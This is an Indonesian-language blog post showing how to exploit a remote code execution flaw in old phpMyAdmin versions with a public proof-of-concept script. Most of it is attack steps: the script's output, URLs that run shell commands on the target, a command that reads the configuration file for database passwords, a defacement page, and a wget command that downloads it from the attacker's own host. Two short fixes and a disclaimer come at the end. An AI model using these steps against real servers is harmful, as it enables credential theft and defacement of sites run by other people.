Remote Code Execution pada phpMyAdmin

Sudah saatnya untuk membuat postingan di blog, sudah 3 hari belum kelar juga artikel ini, yah maklum, kesibukan sebagai mahasiswa yang sedang menempuh Ujian Akhir Semester, tetapi sempat mencuri waktu untuk ngoprek masalah Remote Code Excution. Remote Code Execution adalah sama seperti arbitary code execution, dimana membuat attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi, bedanya dengan Remote Code Execution adalah sang attacker melakukan injeksi coding melalui dengan mesin yang berbeda, maksudnya dilakukan secara remote terhadap mesin target.

Pada artikel kali ini membahas bagaimana konsep dari Remote Code Execution pada bugs yang ada pada versi phpMyAdmin < 3.0.1.1. pagvac dari gnucitizen.org membuat sebuah POC  “phpmyadminrce.sh” yang menginjeksi coding di /config/config.inc yang memungkinkan kepada kita untuk menjalankan perintah shell pada url, seperti melihat direktori, file konfigurasi, password, atau mendeface halaman web.

root@slackware:/media/ITS MINE/research# ./phpmyadminrce.sh http://target.com/phpMyAdmin/
[+] checking if phpMyAdmin exists on URL provided …
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() …
[+] success! phpinfo() injected successfully! output saved on /tmp/phpmyadminrce.sh.3720.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
http://target.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/
http://target.com/phpMyAdmin//config/config.inc.php?p=phpinfo();
please send any feedback/improvements for this script to unknown.pentester<AT_sign__here>gmail.com
root@slackware:/media/ITS MINE/research#

Aksi di atas adalah ketika kita berhasil menginjeksi /config/config.inc yang vulerable dan output tersimpan di dalam direktori /temp beserta cookies disana, lalu membuat kita menjalankan perintah shell di address bar seperti melihat isi konfigurasi phpMyAdmin yang tersimpan sebuah harta karun, yaitu password beserta username. WoW.!!!

contoh :

http://target.com/phpMyAdmin//config/config.inc.php?c=cat+/srv/httpd/htdocs/phpMyAdmin/config/config.inc.php

Kalau sudah tau password untuk akses database sudah membuat kita berbuat semaunya terhadap aplikasi tersebut. Kita buat file index.html terserah anda bagaimana desain halaman tersebut. Kegunaannya untuk memberi tahu si admin, kalo sistemnya lemah, dan sekalian buat mejeng nama buar terkenal gitu (kiddies style)

<html>
<title>defaced</title>
<body bgcolor="#000000">
<font color="red" size="26" align="center">
u are being hacked</font>
</body></html>

Lalu upload ke webhosting anda, setelah itu kita upload di server target dengan perintah :

http://target.com/phpMyAdmin//config/config.inc.php?c=wget+http://situsgue.com/index.html

coba lihat hasilnya

Solusi :

1. Jangan gunakan script “scripts/setup.php” untuk menginstal phpMyAdmin dan lebih baik baca dokumentasi konfigurasi secara manual dan hapus “scripts/setup.php”
2. Segera update phpMyAdmin versi > 3.1.x.x

Tujuan tulisan ini adalah bukan menjadikan kita sebagai orang jahat, dan jangan sekali-kali berbangga dengan hal tersebut, tapi bertujuan artikel ini adalah menambah sedikit nutrisi otak kita, menjadikan kita semakin waspada terhadap segala ancaman terhadap sistem kita, dan selalu perbaharui informasi yang bertujuan melindungi sistem yang kita kelola, Sampai disini artikel tentang pembahasan “Remote Code Execution” , gara-gara postingan ini nieh,, bikin gue telat rapat mentor di kampus kemaren hahahaa

bangun tidur, tidur lagi
bangun lage,, tidur lagee
banguuuuunn,,,, tiduur lageee,,,

Download : phpmyadminrce.sh

reference :
http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
http://en.wikipedia.org/wiki/Arbitrary_code_execution